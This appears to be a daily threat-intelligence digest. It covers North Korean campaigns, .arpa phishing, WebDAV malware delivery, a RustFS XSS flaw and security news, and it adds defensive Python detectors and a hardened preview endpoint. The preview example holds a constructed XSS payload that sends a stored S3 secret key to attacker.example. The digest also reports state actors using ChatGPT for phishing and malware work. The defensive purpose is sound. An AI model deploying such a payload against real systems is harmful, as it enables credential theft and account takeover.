APT37 Ruby Jumper 🔍, .arpa TLD abuse 🌐, Anthropic AI ban 🚫, RustFS XSS vulnerability 💻, The Com arrests 👮

Daily Threat Intel Digest - 2026-02-28

🔴 Critical Threats & Active Exploitation

[NEW] North Korean APT37 deploys Ruby Jumper toolkit to breach air-gapped networks
North Korean state actors are using removable media to bridge air-gapped environments in a campaign tracked as Ruby Jumper. The attack begins with malicious LNK files that launch a PowerShell chain, which ultimately installs five purpose-built tools: RESTLEAF for initial compromise, SNAKEDROPPER for payload delivery, THUMBSBD for bidirectional C2 over USB drives, VIRUSTASK for propagation, and FOOTWINE for Android surveillance. THUMBSBD is the most concerning component: it creates hidden directories on inserted USB drives and uses them as a covert relay, carrying tasking into the isolated network and exfiltrated data out of it whenever the same drive is moved between connected and air-gapped hosts. The toolkit also includes the previously documented BLUELIGHT backdoor and checks for at least 2GB of free space on the removable drive before staging. Researchers attribute the activity to APT37 based on overlap with the group’s historic TTPs [BleepingComputer]. Because the relay only works if one drive touches both sides, USB device-control logging on the internet-connected hosts that also service air-gapped systems is where this campaign is most visible.

[NEW] UAT-10027 targets U.S. education and healthcare with DoH-backdoored implants
A threat actor tracked as UAT-10027, assessed to be North Korean on the basis of code overlap with LazarLoader, is deploying the Dohdoor backdoor against U.S. educational institutions and healthcare facilities. The malware carries its command-and-control over DNS-over-HTTPS (DoH), so beacon traffic looks like ordinary encrypted DNS queries to Cloudflare infrastructure and never appears in conventional DNS server logs. Execution relies on DLL side-loading through legitimate Windows executables such as Fondue.exe and mblctr.exe, followed by an “unhooking” step that strips EDR user-mode hooks from ntdll.dll before the payload runs. The infection chain uses PowerShell scripts to pull batch files from staging servers and ends with reflective loading of Cobalt Strike beacons. The choice of non-traditional targets such as elderly care facilities suggests North Korean operations are expanding beyond their usual financial and military espionage focus [SOCFortress]. The observable seams here are DoH traffic originating from a process that is not a browser, and name resolution that bypasses the enterprise resolver entirely.

[UPDATE] RESURGE malware can remain dormant on Ivanti devices for extended periods
CISA has published updated analysis of the RESURGE implant showing that it can lie dormant on compromised Ivanti Connect Secure appliances until an operator makes contact. The malware hooks accept() and checks the opening bytes of inbound TLS connections against a CRC32 fingerprint, activating only when a matching connection arrives and passing everything else through untouched. RESURGE uses a forged Ivanti certificate for authentication only, not for encryption, and then negotiates a mutual-TLS session on an elliptic-curve cipher suite for operator communication. The implant bundles rootkit, bootkit, and proxy capabilities, and ships with a SpawnSloth variant (liblogblock.so) for log tampering. CISA warns that devices compromised via CVE-2025-0282 may still carry a dormant RESURGE infection despite remediation efforts; because the implant generates no traffic of its own while waiting, the absence of beaconing is not evidence that an appliance is clean, and patching in place is not a substitute for resetting and rebuilding it [BleepingComputer].

🎯 Threat Actor Activity & Campaigns

[NEW] Phishing campaigns exploit .arpa TLD and IPv6 tunnels to evade security controls
Attackers are weaponizing the .arpa top-level domain, which is reserved for internet infrastructure such as reverse DNS, to bypass traditional security controls. Whoever holds a block of IPv6 space is also delegated the matching reverse zone under ip6.arpa, so a threat actor who obtains free IPv6 address space gains administrative control of a corresponding .arpa subdomain and can publish records that were never meant to live there, such as ‘A’ records on reverse-DNS-style names (e.g., d.d.e…ip6.arpa) that resolve to a phishing host while looking like trusted infrastructure. The phishing emails consist of a single image with a hidden .arpa link, routing victims through Traffic Distribution Systems that fingerprint the device before redirecting to the malicious landing page. Alongside .arpa abuse, the same actors are hijacking dangling CNAME records that point at expired domains such as publicnoticessites[.]com and hobsonsms[.]com, inheriting subdomains of government agencies, universities, and corporations. Researchers note that .arpa names rarely trigger reputation blocklists because of the TLD’s critical role in internet operations [CyberPress]. The practical counter is blunt but safe: no legitimate user-facing web service lives under .arpa, so http(s) links to any .arpa hostname can be blocked or flagged outright without affecting ordinary PTR lookups.
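
The following is an added example for this digest, not code from the cited research: it decodes ip6.arpa and in-addr.arpa names back into the address block they describe (so an analyst can see which prefix, typically a tunnel-broker allocation, the sender controls) and flags any extracted link whose host sits under .arpa. The sample URLs are constructed from documentation address ranges, not real indicators.

```python
"""Decode reverse-DNS (.arpa) names and flag .arpa hostnames in extracted links.

Added example for this digest, not code from the cited research. The sample
URLs are constructed and use documentation address ranges, not real indicators.
"""
import ipaddress
from urllib.parse import urlparse


def decode_arpa_name(host):
    """Return (network, zone) for a name under ip6.arpa or in-addr.arpa, else None.

    Reverse-zone labels run least-significant first, so they are reversed before
    reassembly. A name with fewer labels than a full address is treated as the
    prefix it delegates: missing low-order bits are zero and the prefix length
    is derived from the number of labels present.
    """
    h = host.rstrip(".").lower()
    if h.endswith(".ip6.arpa"):
        nibbles = h[: -len(".ip6.arpa")].split(".")
        if len(nibbles) > 32 or not all(len(n) == 1 and n in "0123456789abcdef" for n in nibbles):
            return None
        hexstr = "".join(reversed(nibbles)).ljust(32, "0")
        addr = ipaddress.IPv6Address(int(hexstr, 16))
        return ipaddress.IPv6Network((addr, len(nibbles) * 4)), "ip6.arpa"
    if h.endswith(".in-addr.arpa"):
        octets = h[: -len(".in-addr.arpa")].split(".")
        if len(octets) > 4 or not all(o.isdigit() and o == str(int(o)) and int(o) <= 255 for o in octets):
            return None
        full = list(reversed(octets)) + ["0"] * (4 - len(octets))
        addr = ipaddress.IPv4Address(".".join(full))
        return ipaddress.IPv4Network((addr, len(octets) * 8)), "in-addr.arpa"
    return None


def flag_arpa_links(urls):
    """Return (url, decoded_prefix) for every link whose host is under .arpa.

    Reputation blocklists key on registrable domains and .arpa names are not
    registrable, but no user-facing web service lives there either, so a link
    to an .arpa host is suspicious on its own. The decoded prefix tells you which
    address block the sender was able to obtain reverse delegation for.
    """
    findings = []
    for url in urls:
        host = (urlparse(url).hostname or "").lower()
        if host == "arpa" or host.endswith(".arpa"):
            decoded = decode_arpa_name(host)
            findings.append((url, str(decoded[0]) if decoded else "unrecognised .arpa name"))
    return findings


# Constructed sample links (documentation prefixes 2001:db8::/32 and 203.0.113.0/24).
SAMPLE_URLS = [
    "https://login.example.com/reset",
    "http://0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa/inbox",
    "https://8.b.d.0.1.0.0.2.ip6.arpa/",
    "https://5.113.0.203.in-addr.arpa/verify",
    "https://docs.example.arpa/",
]

if __name__ == "__main__":
    for url, prefix in flag_arpa_links(SAMPLE_URLS):
        print(f"{prefix:<24} {url}")
```

The second sample decodes to a single /128 host, the third to the whole 2001:db8::/32 delegation, and the last one is flagged even though it is not a reverse-DNS name at all, which is the behaviour you want from a mail gateway rule: the TLD alone is the signal.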

[NEW] Attackers exploit Windows File Explorer and WebDAV to distribute malware
Cofense Intelligence researchers uncovered an ongoing campaign that abuses Windows File Explorer and the legacy WebDAV protocol to distribute Remote Access Trojans (RATs). Because Explorer mounts a WebDAV share as though it were an ordinary file share, a payload fetched this way sidesteps the browser’s download controls, and some Endpoint Detection and Response (EDR) products that key on browser-originated downloads miss it as well. The campaign relies on the protocol’s trusted status within Windows to deliver payloads while evading monitoring that focuses on HTTP/HTTPS browser traffic [GBHackers].
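
As an added detection example (not Cofense’s logic and not from the original article), the script below scans process-creation events for the two artefacts a WebDAV-delivered payload leaves behind on Windows: the Mini-Redirector’s UNC form `\\host@port\DavWWWRoot\...` (or `\\host@SSL\...`) in a process image or command line, and the `rundll32.exe ...\davclnt.dll,DavSetCookie <host> <url>` invocation the WebClient service makes when a WebDAV session opens. Events are constructed in a simplified `image|parent|commandline` form; map the fields from real Sysmon Event ID 1 or EDR telemetry instead.

```python
r"""Flag process-creation telemetry that shows a payload being launched over WebDAV.

Added example for this digest, not Cofense's detection logic. Events are
constructed in a simplified "image|parent|commandline" form so the example is
self-contained. Two Windows facts drive the rules: the WebDAV Mini-Redirector
addresses shares as \\host@port\DavWWWRoot\... (or \\host@SSL\...), and the
WebClient service runs rundll32.exe ...\davclnt.dll,DavSetCookie <host> <url>
when a WebDAV session is established.
"""
import re

WEBDAV_UNC = re.compile(
    r"\\\\(?P<host>[\w.\-]+)@(?:SSL@?\d*|\d+)\\(?:DavWWWRoot\\)?(?P<path>[^\s\"']+)",
    re.IGNORECASE,
)
DAV_SET_COOKIE = re.compile(
    r"davclnt\.dll,DavSetCookie\s+(?P<host>\S+)\s+(?P<url>\S+)", re.IGNORECASE
)
# Extensions worth alerting on when they are sourced from a WebDAV share.
PAYLOAD_EXT = re.compile(r"\.(exe|dll|cmd|bat|js|jse|vbs|vbe|hta|msi|lnk|ps1|scr)$", re.IGNORECASE)


def parse_event(line):
    image, parent, cmdline = line.split("|", 2)
    return {"image": image.strip(), "parent": parent.strip(), "cmdline": cmdline.strip()}


def classify(event):
    """Return (rule, host, target) or None for one process-creation event."""
    m = DAV_SET_COOKIE.search(event["cmdline"])
    if m:
        # Session establishment fires for benign shares too, so treat it as
        # context (which host, which URL) rather than an alert on its own.
        return ("webdav-session", m.group("host"), m.group("url"))
    # A process whose image lives on a WebDAV share, or whose command line
    # names an executable there, is the actual launch of remote content.
    m = WEBDAV_UNC.search(event["image"] + " " + event["cmdline"])
    if m and PAYLOAD_EXT.search(m.group("path")):
        return ("webdav-payload", m.group("host"), m.group("path"))
    return None


def scan(lines):
    """Run classify over raw event lines; returns (image, rule, host, target) tuples."""
    findings = []
    for event in map(parse_event, lines):
        finding = classify(event)
        if finding:
            findings.append((event["image"],) + finding)
    return findings


SAMPLE_EVENTS = [  # constructed, not real telemetry; 203.0.113.0/24 is a documentation range
    r"C:\Windows\explorer.exe|C:\Windows\System32\userinit.exe|C:\Windows\Explorer.EXE",
    r"C:\Windows\System32\rundll32.exe|C:\Windows\System32\svchost.exe|rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 203.0.113.10 http://203.0.113.10/update/setup.exe",
    r"\\203.0.113.10@80\DavWWWRoot\update\setup.exe|C:\Windows\explorer.exe|\\203.0.113.10@80\DavWWWRoot\update\setup.exe",
    r"C:\Windows\System32\cmd.exe|C:\Windows\explorer.exe|cmd.exe /c \\files.example.net@SSL\DavWWWRoot\docs\invoice.cmd",
    r"C:\Windows\System32\notepad.exe|C:\Windows\explorer.exe|notepad.exe \\files.example.net@SSL\DavWWWRoot\docs\readme.txt",
]

if __name__ == "__main__":
    for image, rule, host, target in scan(SAMPLE_EVENTS):
        print(f"{rule:<15} host={host:<20} target={target}  ({image})")
```

The `webdav-session` hit is deliberately low severity: the same `DavSetCookie` call appears for legitimate SharePoint and intranet shares. Correlating it with a `webdav-payload` launch from the same host within a short window is what turns the pair into a confident alert, and the notepad event shows why the extension filter matters.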

[UPDATE] OpenAI confirms Chinese state-linked hackers exploited ChatGPT for cyber operations
OpenAI has suspended multiple accounts linked to Chinese APT groups that were using ChatGPT to support cyberattack activity. The actors used the model to generate and refine phishing emails, to translate and adapt malicious code components, and to simulate attack scenarios against defense, technology, and policy-sector targets. This is one of the first confirmed cases of Chinese state-linked operators integrating generative AI directly into tactical operations. Separately, OpenAI identified a Russian “Rybar” network content farm that used ChatGPT to mass-produce multilingual disinformation and propaganda, though engagement varied widely depending on account popularity and platform algorithms [CyberPress].

⚠️ Vulnerabilities & Patches

[NEW] Stored XSS in RustFS Console leaks admin S3 credentials (CVE-2026-27822)
A critical stored cross-site scripting vulnerability in RustFS Console versions before 1.0.0-alpha.82 allows an attacker with upload rights to steal administrative S3 credentials and take over the account. The flaw is in the preview modal, which renders objects such as PDFs in an iframe without validating the content type. An attacker uploads a file named “xss.pdf” whose body is HTML and whose stored Content-Type metadata is text/html; when an administrator previews it, the browser renders the object as a document in a same-origin iframe, and the embedded JavaScript reads the console’s localStorage, which holds the S3 credential triple (AccessKeyId, SecretAccessKey, SessionToken). The vulnerability carries a CVSS v3.1 score of 9.9; upgrade to 1.0.0-alpha.83 immediately, and serve object previews from a separate origin with appropriate security headers so that user-uploaded content never shares an origin with the console’s session state [CyberPress; GBHackers]. The broader lesson is that any storage console keeping long-lived keys in localStorage is one XSS away from this outcome regardless of the preview bug.
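
The hardened shape of a preview endpoint, written as an added example modelled on the bug above (this is not RustFS code; the origin names, response shape and magic-byte table are assumptions): previews are refused anywhere but a dedicated preview origin that holds no credentials, the type is decided from the object’s leading bytes rather than its stored metadata, and any disagreement forces a download instead of inline rendering.

```python
"""Content-type validation and origin separation for an object-preview endpoint.

Added example modelled on the RustFS Console bug described above. It is not
RustFS code: the origin names, the response shape and the magic-byte table are
assumptions made for illustration.
"""
import re

CONSOLE_ORIGIN = "https://console.example.internal"  # assumed: admin UI, where localStorage holds credentials
PREVIEW_ORIGIN = "https://preview.example.internal"  # assumed: separate site with no session state at all

# Types the preview modal may render inline, keyed by the magic bytes that prove them.
PREVIEWABLE = {
    "application/pdf": b"%PDF-",
    "image/png": b"\x89PNG\r\n\x1a\n",
    "image/jpeg": b"\xff\xd8\xff",
}


def sniff_type(data):
    """Return the previewable type implied by the leading bytes, or None."""
    for content_type, magic in PREVIEWABLE.items():
        if data.startswith(magic):
            return content_type
    return None


def safe_filename(object_key):
    """Basename only, restricted charset, so Content-Disposition cannot be broken out of."""
    return re.sub(r"[^\w.\-]", "_", object_key.rsplit("/", 1)[-1]) or "download"


def preview_response(request_origin, object_key, stored_content_type, data):
    """Return (status, headers, body) for a preview request.

    Vulnerable pattern: build an iframe on the console origin and echo the stored
    Content-Type. Hardened pattern, as here: serve previews only from the preview
    origin, derive the type from the bytes, and force download on any mismatch.
    """
    if request_origin != PREVIEW_ORIGIN:
        return 403, {"Content-Type": "text/plain"}, b"previews are served only from the preview origin"
    declared = stored_content_type.split(";")[0].strip().lower()
    sniffed = sniff_type(data)
    common = {"X-Content-Type-Options": "nosniff", "Cache-Control": "no-store"}
    if sniffed is None or sniffed != declared:
        # e.g. "xss.pdf" stored as text/html, or HTML bytes stored as application/pdf
        return 200, {**common,
                     "Content-Type": "application/octet-stream",
                     "Content-Disposition": f'attachment; filename="{safe_filename(object_key)}"'}, data
    return 200, {**common,
                 "Content-Type": sniffed,
                 "Content-Disposition": f'inline; filename="{safe_filename(object_key)}"',
                 # belt and braces: if a viewer bug ever executed content, deny scripts and subresources
                 "Content-Security-Policy": "default-src 'none'"}, data


# Constructed objects for the demo: the attacker's upload and a minimal real PDF.
XSS_PDF = b"<html><script>fetch('https://attacker.example/?k='+localStorage.getItem('SecretAccessKey'))</script></html>"
REAL_PDF = b"%PDF-1.7\n1 0 obj << /Type /Catalog >> endobj\n%%EOF\n"

if __name__ == "__main__":
    for key, ct, body in [("xss.pdf", "text/html", XSS_PDF),
                          ("evil.pdf", "application/pdf", XSS_PDF),
                          ("report.pdf", "application/pdf", REAL_PDF)]:
        status, headers, _ = preview_response(PREVIEW_ORIGIN, key, ct, body)
        print(f"{key:<12} {status} {headers['Content-Type']:<26} {headers['Content-Disposition']}")
```

The origin check is the part that actually neutralises the credential theft: even if a future viewer bug let uploaded content run, a script executing on `preview.example.internal` has no access to the console origin’s localStorage.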

[NEW] Metasploit adds exploits for Ollama AI, BeyondTrust RCE, and ARM64 evasion
Rapid7’s February 2026 Metasploit Framework update adds several notable exploit modules. One provides unauthenticated RCE against Ollama AI infrastructure (CVE-2024-37032) via a path traversal in the model-pull mechanism. New modules for BeyondTrust Privileged Remote Access and Remote Support target the severe command injection vulnerability CVE-2026-1731. The update also adds exploitation of Grandstream GXP1600 VoIP phones (CVE-2026-2329), a stack overflow that yields a root session. Finally, Metasploit introduces its first dedicated Linux evasion module for ARM64, using RC4-encrypted packers and sleep-based delays to slip past automated sandboxes and scanners [CyberPress]. For defenders, the Ollama module is the one to act on: the underlying bug dates from 2024, so any instance that has not been updated since then is now exploitable with an off-the-shelf tool.

[NEW] FreeBSD patches jail escape and routing socket vulnerabilities
FreeBSD released security advisories addressing multiple vulnerabilities. CVE-2025-15576 allows a process to escape its jail’s chroot via file descriptors passed between jails, undermining the jail as a confinement boundary in the same way a container breakout would. CVE-2026-3036, in the routing socket code, can be triggered by a local user for denial of service and possible privilege escalation. The advisories cover FreeBSD 14.3 and 13.5; apply the vendor-supplied patches promptly [Malware.news].

🛡️ Defense & Detection

[NEW] Microsoft testing Windows 11 batch file security hardening
Microsoft is testing a hardening of batch-file execution in new Windows 11 Insider Preview builds. cmd.exe reads a batch file from disk incrementally as it runs, so the file can be altered mid-execution and later lines swapped for attacker-controlled commands; the new mode, enabled by adding the LockBatchFilesInUse registry value (or through an application manifest setting), locks the file for the duration of the run so it cannot be modified. When code integrity is enabled the change also improves performance and security, because the file’s signature needs to be validated once rather than at every statement. The feature addresses long-standing concerns about batch-file tampering in enterprise environments [BleepingComputer].

[NEW] Chrome advances quantum-resistant HTTPS with Merkle Tree Certificates
Google announced a multi-phase program to bring quantum-safe HTTPS to Chrome using Merkle Tree Certificates (MTCs) rather than conventional X.509 certificate chains carrying post-quantum signatures. Post-quantum signature schemes have large signatures and public keys, and a classic chain carries several of each; an MTC instead binds a batch of certificates into a Merkle tree, so what the server sends is a short path of hashes up to a tree root the browser already trusts rather than a stack of large signatures, and quantum-resistant algorithms become usable without a heavy bandwidth penalty. Phase 1 is a feasibility study with Cloudflare; Phase 2 (Q1 2027) onboards Certificate Transparency log operators; Phase 3 (Q3 2027) establishes a Chrome Quantum-resistant Root Store (CQRS). The design emphasizes transparency by default, ACME-only issuance workflows, and reproducible Domain Control Validation [Google Security Blog].
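
To make the bandwidth argument concrete, here is an added worked example (not Google’s or the MTC draft’s code) of a Merkle inclusion proof using the Certificate Transparency hashing rules from RFC 6962/9162: leaf = H(0x00 || data), node = H(0x01 || left || right). The real MTC draft defines its own assertion encoding and batching, so treat the layout as an analogue; the sample “assertions” are constructed strings. The point it shows is that membership in a batch of 2^20 certificates costs 20 hashes, 640 bytes, whereas a single ML-DSA-44 signature is 2420 bytes.

```python
"""Merkle inclusion proof (RFC 6962/9162 construction) as a worked illustration
of why a Merkle Tree Certificate is compact.

Added example for this digest. It uses the Certificate Transparency hashing
rules (leaf = H(0x00||data), node = H(0x01||left||right)); the real MTC draft
defines its own assertion encoding and batching, so the layout here is only an
analogue. Sample assertions are constructed.
"""
import hashlib
import math


def _h(b):
    return hashlib.sha256(b).digest()


def leaf_hash(data):
    return _h(b"\x00" + data)


def node_hash(left, right):
    return _h(b"\x01" + left + right)


def _split(n):
    """Largest power of two strictly less than n (n >= 2), per RFC 6962."""
    return 1 << ((n - 1).bit_length() - 1)


def merkle_root(leaves):
    """Tree hash over the list of leaf data; unbalanced trees are allowed."""
    if not leaves:
        return _h(b"")
    if len(leaves) == 1:
        return leaf_hash(leaves[0])
    k = _split(len(leaves))
    return node_hash(merkle_root(leaves[:k]), merkle_root(leaves[k:]))


def inclusion_proof(leaves, index):
    """Sibling hashes from the leaf up to the root: what a server would send
    in place of a signature chain."""
    if len(leaves) == 1:
        return []
    k = _split(len(leaves))
    if index < k:
        return inclusion_proof(leaves[:k], index) + [merkle_root(leaves[k:])]
    return inclusion_proof(leaves[k:], index - k) + [merkle_root(leaves[:k])]


def verify_inclusion(leaf_data, index, tree_size, proof, root):
    """Client-side check: recompute the root from the leaf and the audit path
    (RFC 9162 section 2.1.3.2) and compare it to the root already trusted."""
    if index >= tree_size:
        return False
    fn, sn = index, tree_size - 1
    r = leaf_hash(leaf_data)
    for p in proof:
        if sn == 0:
            return False
        if (fn & 1) or fn == sn:
            r = node_hash(p, r)
            if not (fn & 1):
                while (fn & 1) == 0 and fn != 0:
                    fn >>= 1
                    sn >>= 1
        else:
            r = node_hash(r, p)
        fn >>= 1
        sn >>= 1
    return sn == 0 and r == root


def proof_bytes(tree_size, hash_len=32):
    """Upper bound on audit-path size for a tree of tree_size leaves."""
    return math.ceil(math.log2(tree_size)) * hash_len if tree_size > 1 else 0


# Constructed batch of assertions: "<name>|<algorithm>|<hex key>" stand-ins.
ASSERTIONS = [f"site{i}.example|ML-DSA-44|{i:064x}".encode() for i in range(6)]

if __name__ == "__main__":
    root = merkle_root(ASSERTIONS)
    proof = inclusion_proof(ASSERTIONS, 4)
    print("proof hashes:", len(proof), "verified:", verify_inclusion(ASSERTIONS[4], 4, 6, proof, root))
    print("audit path for 2^20 leaves:", proof_bytes(1 << 20), "bytes")
```

What the tree does not do is establish that the root itself is genuine; in the MTC design that trust comes from the root being published through transparency logs and shipped to the browser out of band, which is why the program’s later phases concern CT log operators and a dedicated root store rather than the tree arithmetic.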

📋 Policy & Industry News

[NEW] Trump bans Anthropic AI in federal agencies amid security concerns
The U.S. government has designated Anthropic a supply chain risk to national security, the first time a domestic AI firm has received a classification previously reserved for foreign entities such as Huawei. President Trump ordered federal agencies to stop using Claude AI immediately, with a six-month phase-out period for dependent departments including the Department of War. The ban stems from Anthropic’s refusal to grant the Pentagon unrestricted access for mass domestic surveillance and autonomous weapons development. Anthropic plans to challenge the designation in court, arguing that it legally applies only to DoW contracts under 10 USC 3252. The move could also affect Anthropic’s partnerships with cloud providers that hold substantial defense contracts [CyberPress; GBHackers].

[NEW] Europol operation arrests 30 members of “The Com” cybercrime network
A yearlong Europol-coordinated operation, Project Compass, resulted in 30 arrests and the identification of 179 suspects connected to “The Com,” a decentralized cybercrime collective whose recruitment and victimization center on children and teenagers. The network operates across social media, gaming platforms, messaging apps, and music streaming services, and is organized into subgroups including “Cyber Com” (network intrusions and ransomware), “(S)extortion Com” (targeting minors and promoting self-harm), and “Offline Com” (property damage and terrorism). Two alleged leaders of the “764” subgroup, known for grooming minors into producing explicit content, were arrested in April 2025 and face life imprisonment. The group has been linked to high-profile ransomware attacks on Marks & Spencer, Co-op, Harrods, and Las Vegas casinos [BleepingComputer].

[NEW] Datadog report reveals 87% of organizations exposed to exploitable vulnerabilities
Datadog’s State of DevSecOps 2026 report finds that 87% of organizations have at least one exploitable vulnerability affecting 40% of their services. Java services lead with 59% exploitable flaws, followed by .NET at 47% and Rust at 40%. Services using end-of-life (EOL) runtimes show 50% vulnerability rates compared to 37% on supported versions. The report highlights that median dependencies lag 278 days behind latest versions, with Java specifically lagging 492 days. Only 18% of “critical” vulnerabilities remain truly critical after context adjustment based on runtime exposure and exploit availability [CyberPress].